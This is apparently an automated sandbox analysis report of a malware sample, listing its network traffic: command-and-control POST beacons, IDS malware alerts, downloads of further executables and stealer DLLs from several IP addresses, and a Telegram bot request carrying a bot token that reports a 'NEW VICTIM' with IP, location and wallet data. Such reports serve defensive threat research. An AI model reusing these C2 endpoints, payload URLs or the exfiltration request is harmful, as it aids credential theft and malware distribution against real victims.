                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                      Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                      Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49858 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49872 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49890 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49931 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49912 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49946 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49957 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49975 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49983 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.81.68.147:80 -> 192.168.2.10:49983
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50010 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50037 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:50024 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50039 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50049 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50065 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:50084 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50259 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50263 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50271 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50299 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50308 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50284 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50238 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50267 -> 172.67.213.48:443
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024E0C0 recv,recv,recv,recv,0_2_0024E0C0
                      Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/7427009775/dwVrTdy.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/7427009775/AzVRM7c.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/7427009775/t5abhIx.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/8199790517/u1w30Wt.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /ctx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                      Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /fcxcx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                      Source: global trafficHTTP traffic detected: GET /vvv.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                      Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
